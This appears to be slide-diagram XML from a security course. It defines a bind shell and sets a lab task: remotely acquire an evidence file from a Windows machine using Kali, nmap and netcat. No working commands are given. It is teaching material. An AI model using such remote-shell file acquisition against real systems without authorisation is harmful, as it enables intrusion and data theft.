    <dgm:cxn modelId="{58074B25-91A4-4C8B-BC50-E159069F5640}" type="presParOf" srcId="{2CD8BE19-65E1-4762-913A-3A404162ACD6}" destId="{C0B2FD82-F60E-46C0-8C17-15A7F5741DE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73800C-0F25-4317-AB8F-D63A811B0889}"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7F576481-BEB9-480F-8326-83EEE58C2D9A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Bind shell - attacker's machine acts as a client and victim's machine acts as a server opening up a communication port on the victim and waiting for the client to connect to it and then issue commands that will be remotely (with respect to the attacker) executed on the victim's machine. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D8438CC-7B53-4A90-B635-D396E7FA84E1}" type="parTrans" cxnId="{BBAA1694-1BB5-44C5-ABF5-203682607534}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{04CBB1E8-D136-4D62-A577-640CF97D21DA}" type="sibTrans" cxnId="{BBAA1694-1BB5-44C5-ABF5-203682607534}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0278A277-47DC-47BE-A3A2-047C7EF31F78}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>firewall etc. may block the bind shell</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A0AFC0C-AAEB-47F4-8967-4468F892E11A}" type="parTrans" cxnId="{A31D3D49-6157-4E9C-BA48-C87C0983D824}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A6B113A-F92E-4BEE-A1E3-B2CA8CC511D2}" type="sibTrans" cxnId="{A31D3D49-6157-4E9C-BA48-C87C0983D824}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{625019E7-CD61-4324-85D3-E1C0BD74F39F}" type="pres">
      <dgm:prSet presAssocID="{5E73800C-0F25-4317-AB8F-D63A811B0889}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DCC997E6-26A0-4011-85BE-4027DA7B17DF}" type="pres">
      <dgm:prSet presAssocID="{0278A277-47DC-47BE-A3A2-047C7EF31F78}" presName="boxAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FAAD9AAB-FAE9-4CDA-97C8-043A29EBE4A2}" type="pres">
      <dgm:prSet presAssocID="{0278A277-47DC-47BE-A3A2-047C7EF31F78}" presName="parentTextBox" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4CF35A89-D597-4CE4-9A78-4737C1073586}" type="pres">
      <dgm:prSet presAssocID="{04CBB1E8-D136-4D62-A577-640CF97D21DA}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4CD31109-9E3D-456C-93DF-A51208351A50}" type="pres">
      <dgm:prSet presAssocID="{7F576481-BEB9-480F-8326-83EEE58C2D9A}" presName="arrowAndChildren" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{63DA1529-FF99-4C5F-AECE-7FD8E59CD8AD}" type="pres">
      <dgm:prSet presAssocID="{7F576481-BEB9-480F-8326-83EEE58C2D9A}" presName="parentTextArrow" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{A31D3D49-6157-4E9C-BA48-C87C0983D824}" srcId="{5E73800C-0F25-4317-AB8F-D63A811B0889}" destId="{0278A277-47DC-47BE-A3A2-047C7EF31F78}" srcOrd="1" destOrd="0" parTransId="{4A0AFC0C-AAEB-47F4-8967-4468F892E11A}" sibTransId="{0A6B113A-F92E-4BEE-A1E3-B2CA8CC511D2}"/>
    <dgm:cxn modelId="{9F45C56B-47C8-4738-B372-E44D6BEAF1B8}" type="presOf" srcId="{0278A277-47DC-47BE-A3A2-047C7EF31F78}" destId="{FAAD9AAB-FAE9-4CDA-97C8-043A29EBE4A2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{D5393456-C749-4523-A963-51C92F1607E2}" type="presOf" srcId="{5E73800C-0F25-4317-AB8F-D63A811B0889}" destId="{625019E7-CD61-4324-85D3-E1C0BD74F39F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{BBAA1694-1BB5-44C5-ABF5-203682607534}" srcId="{5E73800C-0F25-4317-AB8F-D63A811B0889}" destId="{7F576481-BEB9-480F-8326-83EEE58C2D9A}" srcOrd="0" destOrd="0" parTransId="{3D8438CC-7B53-4A90-B635-D396E7FA84E1}" sibTransId="{04CBB1E8-D136-4D62-A577-640CF97D21DA}"/>
    <dgm:cxn modelId="{5EF3C4EC-F1C2-40AC-8596-621BB1BCD6B9}" type="presOf" srcId="{7F576481-BEB9-480F-8326-83EEE58C2D9A}" destId="{63DA1529-FF99-4C5F-AECE-7FD8E59CD8AD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{4C495C6F-B25F-4556-BCBC-10BD476BF9C8}" type="presParOf" srcId="{625019E7-CD61-4324-85D3-E1C0BD74F39F}" destId="{DCC997E6-26A0-4011-85BE-4027DA7B17DF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{B18D9F53-9670-427A-A4EB-579C564A3606}" type="presParOf" srcId="{DCC997E6-26A0-4011-85BE-4027DA7B17DF}" destId="{FAAD9AAB-FAE9-4CDA-97C8-043A29EBE4A2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{4CEAEF55-998F-43BF-A9A9-F243721EB77E}" type="presParOf" srcId="{625019E7-CD61-4324-85D3-E1C0BD74F39F}" destId="{4CF35A89-D597-4CE4-9A78-4737C1073586}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{9195B833-4E25-4436-BE42-D24C061A81F8}" type="presParOf" srcId="{625019E7-CD61-4324-85D3-E1C0BD74F39F}" destId="{4CD31109-9E3D-456C-93DF-A51208351A50}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process4"/>
    <dgm:cxn modelId="{C6A13942-6017-44C9-B19B-225EB4045813}" type="presParOf" srcId="{4CD31109-9E3D-456C-93DF-A51208351A50}" destId="{63DA1529-FF99-4C5F-AECE-7FD8E59CD8A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151BE3-D669-4BB0-AC61-E7F85651A3BB}"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AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Create a file in Windows</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7216AA6D-30E2-4756-9303-CB12A6B308EC}" type="parTrans" cxnId="{BC0E6945-55F8-4EA8-B90B-780F1BBD2F2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EA3904EF-5CB3-44ED-B0AF-47309710BCC2}" type="sibTrans" cxnId="{BC0E6945-55F8-4EA8-B90B-780F1BBD2F2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05FDD808-7AD8-486B-AE70-F0E81ABD599E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>name it </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" i="1"/>
            <a:t>yourFisrtLastNameEvidence.txt</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72853241-254E-4364-8F6F-B8BA919C4729}" type="parTrans" cxnId="{131658CC-8BCC-442B-A076-058B4D72D08F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C342FB4E-D51D-4D04-A6C2-79AFB821DF9C}" type="sibTrans" cxnId="{131658CC-8BCC-442B-A076-058B4D72D08F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72304965-AB8D-4489-82F0-98561736E34A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>the content of the file “hello </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" i="1"/>
            <a:t>yourname!</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>”</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A7D5AF9-78A8-462F-91A0-7301C98E2BFD}" type="parTrans" cxnId="{1B0253C7-056D-48BC-80C0-B070DB16D7AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2AD0FB1-56B5-4CF2-A6AF-2F12B95BAFDC}" type="sibTrans" cxnId="{1B0253C7-056D-48BC-80C0-B070DB16D7AE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E50453D7-F981-4C0E-92D1-A61F6C45695A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>You don’t allow to touch Windows directly after you create the file</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FFEB251-3CFA-4377-AFC8-105424C17552}" type="parTrans" cxnId="{30107F5E-9C6F-4C02-883C-107F5AA9F2F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{81B12F6C-1F4A-493E-921B-34445F5CFE15}" type="sibTrans" cxnId="{30107F5E-9C6F-4C02-883C-107F5AA9F2F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4587C326-4A84-4647-8405-9397D58FD220}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>you allow to access Windows from Kali</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31887AC5-8D11-4BA5-9E0E-130F352D98DA}" type="parTrans" cxnId="{DF115F38-5970-4E6D-AA89-53297587FCF1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AB67B6A6-A1E6-4DDD-BB84-776FAAE3970A}" type="sibTrans" cxnId="{DF115F38-5970-4E6D-AA89-53297587FCF1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9817E12-2FC4-44AF-92B7-242E331AD9E5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>assume nmap is installed</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{89184CD1-E8E5-4B2B-98FD-1B61C55A070F}" type="parTrans" cxnId="{DADB0B91-AA2D-481E-821B-300B4346C9FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B89D892-78CB-441C-B88D-9C41A203A6AE}" type="sibTrans" cxnId="{DADB0B91-AA2D-481E-821B-300B4346C9FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F91DFA23-D284-4341-8532-CB37403B31AB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Remotely acquire the file from Kali</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2F1EF1E-52C0-47E0-812A-62C2CE0B137E}" type="parTrans" cxnId="{4F3125B3-B3EF-4FDA-B6AC-806A199EAE89}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B5CC911F-FB3D-4293-8437-B381AA47CA2D}" type="sibTrans" cxnId="{4F3125B3-B3EF-4FDA-B6AC-806A199EAE89}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{074FAF12-CFE8-45F6-A1C0-4A2FEC05EEDA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>use command lines, e.g., nc</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{174060DF-09CE-4C73-B695-702212A73F13}" type="parTrans" cxnId="{13925413-CC33-4CFB-A306-4C8CC8FC2CAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9251EB57-2602-45C6-B7A6-B3EF3CEFD1C2}" type="sibTrans" cxnId="{13925413-CC33-4CFB-A306-4C8CC8FC2CAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" type="pres">
      <dgm:prSet presAssocID="{3D151BE3-D669-4BB0-AC61-E7F85651A3BB}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{44771BE4-CA42-4347-A7D9-BFA894F7E2F6}" type="pres">
      <dgm:prSet presAssocID="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FB31EE1B-2CD8-42BA-9E6A-E6BC7151A174}" type="pres">
      <dgm:prSet presAssocID="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E3D7A19-3812-424C-B1CF-C1683BDC44E2}" type="pres">
      <dgm:prSet presAssocID="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{65E265C5-14BD-478E-B996-E645DDDECCE7}" type="pres">
      <dgm:prSet presAssocID="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A2608E3A-5506-44FA-A2BC-D08FF194DB6D}" type="pres">
      <dgm:prSet presAssocID="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A6DCAF14-153A-40B2-9DCD-09CC97694519}" type="pres">
      <dgm:prSet presAssocID="{EA3904EF-5CB3-44ED-B0AF-47309710BCC2}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{37A5C1CE-D72B-4F6E-8255-81D52EA8BEC3}" type="pres">
      <dgm:prSet presAssocID="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{27F39BC9-14A8-4576-84F7-BE4FA9E79632}" type="pres">
      <dgm:prSet presAssocID="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{563F0EF0-C7FD-40E9-BF30-6750726BFA38}" type="pres">
      <dgm:prSet presAssocID="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{68AA5B98-4F51-4752-98CA-30EFB8E4F640}" type="pres">
      <dgm:prSet presAssocID="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4808E826-A5A3-4682-8810-B89CE61FEF5E}" type="pres">
      <dgm:prSet presAssocID="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{055CC929-4FE4-44F1-BA19-4ED5919518E9}" type="pres">
      <dgm:prSet presAssocID="{81B12F6C-1F4A-493E-921B-34445F5CFE15}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8179DEE9-E403-41F5-A87D-0181CCA6BA29}" type="pres">
      <dgm:prSet presAssocID="{F91DFA23-D284-4341-8532-CB37403B31AB}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C9B6995-C30E-4801-B34B-F7FB7836995D}" type="pres">
      <dgm:prSet presAssocID="{F91DFA23-D284-4341-8532-CB37403B31AB}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0A0B1B2D-BDD7-44E8-AD23-04F0C31F2CDB}" type="pres">
      <dgm:prSet presAssocID="{F91DFA23-D284-4341-8532-CB37403B31AB}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EE6B7A4E-ED62-4ED1-955A-93141812DCBE}" type="pres">
      <dgm:prSet presAssocID="{F91DFA23-D284-4341-8532-CB37403B31AB}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{460AB55F-F2D6-4D33-A421-3D88A995DED1}" type="pres">
      <dgm:prSet presAssocID="{F91DFA23-D284-4341-8532-CB37403B31AB}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{13925413-CC33-4CFB-A306-4C8CC8FC2CAC}" srcId="{F91DFA23-D284-4341-8532-CB37403B31AB}" destId="{074FAF12-CFE8-45F6-A1C0-4A2FEC05EEDA}" srcOrd="0" destOrd="0" parTransId="{174060DF-09CE-4C73-B695-702212A73F13}" sibTransId="{9251EB57-2602-45C6-B7A6-B3EF3CEFD1C2}"/>
    <dgm:cxn modelId="{DF115F38-5970-4E6D-AA89-53297587FCF1}" srcId="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" destId="{4587C326-4A84-4647-8405-9397D58FD220}" srcOrd="0" destOrd="0" parTransId="{31887AC5-8D11-4BA5-9E0E-130F352D98DA}" sibTransId="{AB67B6A6-A1E6-4DDD-BB84-776FAAE3970A}"/>
    <dgm:cxn modelId="{30107F5E-9C6F-4C02-883C-107F5AA9F2F4}" srcId="{3D151BE3-D669-4BB0-AC61-E7F85651A3BB}" destId="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" srcOrd="1" destOrd="0" parTransId="{3FFEB251-3CFA-4377-AFC8-105424C17552}" sibTransId="{81B12F6C-1F4A-493E-921B-34445F5CFE15}"/>
    <dgm:cxn modelId="{8C8AED5E-D994-403D-94FA-5808176C5320}" type="presOf" srcId="{4587C326-4A84-4647-8405-9397D58FD220}" destId="{4808E826-A5A3-4682-8810-B89CE61FEF5E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{E1E99841-4A65-4E7D-99D1-6FDA64804681}" type="presOf" srcId="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" destId="{27F39BC9-14A8-4576-84F7-BE4FA9E79632}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{BC0E6945-55F8-4EA8-B90B-780F1BBD2F2D}" srcId="{3D151BE3-D669-4BB0-AC61-E7F85651A3BB}" destId="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" srcOrd="0" destOrd="0" parTransId="{7216AA6D-30E2-4756-9303-CB12A6B308EC}" sibTransId="{EA3904EF-5CB3-44ED-B0AF-47309710BCC2}"/>
    <dgm:cxn modelId="{4478F559-74C4-4E95-A53D-312C2D8B5C91}" type="presOf" srcId="{F91DFA23-D284-4341-8532-CB37403B31AB}" destId="{0A0B1B2D-BDD7-44E8-AD23-04F0C31F2CDB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{3E070F7C-20E8-4E49-8665-3BCE850ED05D}" type="presOf" srcId="{A9817E12-2FC4-44AF-92B7-242E331AD9E5}" destId="{4808E826-A5A3-4682-8810-B89CE61FEF5E}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A03A3685-FEB1-45F6-9DB9-F386574143FA}" type="presOf" srcId="{3D151BE3-D669-4BB0-AC61-E7F85651A3BB}" destId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{5DFB568B-91E8-4596-AC76-382DF83670F9}" type="presOf" srcId="{074FAF12-CFE8-45F6-A1C0-4A2FEC05EEDA}" destId="{460AB55F-F2D6-4D33-A421-3D88A995DED1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{DADB0B91-AA2D-481E-821B-300B4346C9FF}" srcId="{E50453D7-F981-4C0E-92D1-A61F6C45695A}" destId="{A9817E12-2FC4-44AF-92B7-242E331AD9E5}" srcOrd="1" destOrd="0" parTransId="{89184CD1-E8E5-4B2B-98FD-1B61C55A070F}" sibTransId="{9B89D892-78CB-441C-B88D-9C41A203A6AE}"/>
    <dgm:cxn modelId="{22E7DBA8-D17B-48D3-BDCA-DE5D48DBC3A5}" type="presOf" srcId="{F91DFA23-D284-4341-8532-CB37403B31AB}" destId="{3C9B6995-C30E-4801-B34B-F7FB7836995D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{796446AB-5A7B-4EF1-A63B-458662B3F6B6}" type="presOf" srcId="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" destId="{1E3D7A19-3812-424C-B1CF-C1683BDC44E2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{4F3125B3-B3EF-4FDA-B6AC-806A199EAE89}" srcId="{3D151BE3-D669-4BB0-AC61-E7F85651A3BB}" destId="{F91DFA23-D284-4341-8532-CB37403B31AB}" srcOrd="2" destOrd="0" parTransId="{A2F1EF1E-52C0-47E0-812A-62C2CE0B137E}" sibTransId="{B5CC911F-FB3D-4293-8437-B381AA47CA2D}"/>
    <dgm:cxn modelId="{342CEDB7-A79F-48B7-808C-9E0E17847465}" type="presOf" srcId="{AD96D537-2CF7-47E6-B8DB-F5E98F3BC063}" destId="{FB31EE1B-2CD8-42BA-9E6A-E6BC7151A174}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{6D2645BB-067A-4807-9AFE-1013DC373C86}" type="presOf" srcId="{05FDD808-7AD8-486B-AE70-F0E81ABD599E}" destId="{A2608E3A-5506-44FA-A2BC-D08FF194DB6D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
